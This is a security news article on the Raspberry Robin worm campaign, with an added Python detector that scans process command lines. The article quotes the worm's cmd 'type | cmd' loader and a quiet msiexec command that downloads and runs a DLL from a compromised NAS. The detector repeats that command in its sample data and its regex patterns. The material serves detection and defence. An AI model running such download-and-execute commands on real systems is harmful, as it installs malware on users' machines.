Worm infection: Raspberry Robin malware campaign affects Windows and Qnap-NAS

Researchers from the IT security company Cybereason have discovered a malware campaign with a computer worm affecting Windows and Qnap network storage devices. It is part of the malware campaign called Raspberry Robin, but the malware is also known as LNK Worm.

Raspberry Robin contains a worm that spreads through USB devices or network shares. It uses compromised Qnap NAS devices as a springboard. The old but still effective method of luring victims with LNK shortcut files is used.

The Raspberry Robin infection starts with two files located in the same directory on an external device or network share: an .lnk file containing a Windows command and a .bat file consisting of padding data and two special commands.

In the specific example, the .lnk file contains the call C:\Windows\System32\cmd.exe" /r tYPE xPhfK.Usb|CmD, while the file xPhfK.Usb contains, in addition to random binary data, the two commands explorer.exe ADATA uFD and mSIExEC /Q -I"hTTP://<address>:8080/<directory>/USER-PC?admin" to download and run the malware.

The msiexec installer already present on the computer (so-called "Living off the Land", LOL) is used to download and run a malicious DLL library from a compromised Qnap NAS device. To complicate detection, Raspberry Robin uses process injection into three legitimate Windows processes and communicates with its command and control servers through the anonymizing Tor network.
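As an added defender-side illustration (not code from Cybereason or from the article), the following Python checks process-creation command lines, as a Sysmon or EDR feed would supply them, for the two hallmarks of the chain described above: cmd.exe piping a typed file into a second cmd, and msiexec quietly installing a package from an HTTP URL. The command lines and the 203.0.113.5 address are constructed sample data; the case-insensitive matching is needed because the loader randomises letter case (tYPE, CmD, mSIExEC).

```python
import re

# Constructed sample process-creation command lines (not real telemetry),
# modelled on the chain described in the article: one line per process.
SAMPLE_CMDLINES = [
    'C:\\Windows\\System32\\cmd.exe /r tYPE xPhfK.Usb|CmD',
    'explorer.exe ADATA uFD',
    'mSIExEC /Q -I"hTTP://203.0.113.5:8080/xyz/USER-PC?admin"',  # constructed IP
    'msiexec /i C:\\Users\\me\\Downloads\\setup.msi /qn',       # benign local install
    'cmd.exe /c type readme.txt',                                # benign type, no pipe
]

# cmd ... /r type <file> | cmd : the padded .bat/.usb file is typed into a second cmd.
TYPE_PIPE_CMD = re.compile(r'\bcmd(\.exe)?\b.*\s/r\s+type\s+\S+\s*\|\s*cmd\b', re.I)
# msiexec with an install switch (/i or -i) whose package argument is an HTTP(S) URL.
MSIEXEC_REMOTE = re.compile(r'\bmsiexec(\.exe)?\b.*?(/|-)i\s*"?https?://[^"\s]+', re.I)
# URL shape from the article's example: port 8080 and a path ending in "?admin".
MSIEXEC_HOSTPATH = re.compile(r'https?://[^/"\s]+:8080/[^"\s]*\?admin', re.I)


def classify(cmdline: str) -> list:
    """Return the list of detection names that fire on one command line."""
    hits = []
    if TYPE_PIPE_CMD.search(cmdline):
        hits.append("cmd_type_pipe_cmd")
    if MSIEXEC_REMOTE.search(cmdline):
        hits.append("msiexec_remote_install")
        if MSIEXEC_HOSTPATH.search(cmdline):
            hits.append("raspberry_robin_url_shape")
    return hits


def scan(cmdlines) -> dict:
    """Map each suspicious command line to the detections it triggered."""
    return {c: classify(c) for c in cmdlines if classify(c)}


if __name__ == "__main__":
    for line, names in scan(SAMPLE_CMDLINES).items():
        print(", ".join(names), "<-", line)
```

The remote-msiexec rule alone will also flag legitimate installs from an internal web server, so in practice pair it with the URL-shape rule or an allow-list of trusted download hosts.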

The malware achieves persistence by creating a registry key that loads and runs the DLL file via rundll32.exe at system startup. In the case examined, the library imitates an Apache DLL named libapriconv-1.dll so as not to arouse suspicion. According to Cybereason, other infections also used a disguise as Qt 5.

Antivirus software can be used to protect against the malware. Cybereason provides further information on how to prevent an infection and what to do after one. IT managers should block outgoing connections to Tor-related addresses, since Raspberry Robin actively communicates with Tor exit nodes.

If an infection does occur, the affected machines should be reinstalled from an image, since the malware entrenches itself and uses hiding mechanisms on infected systems. Cybereason's announcement contains further details.
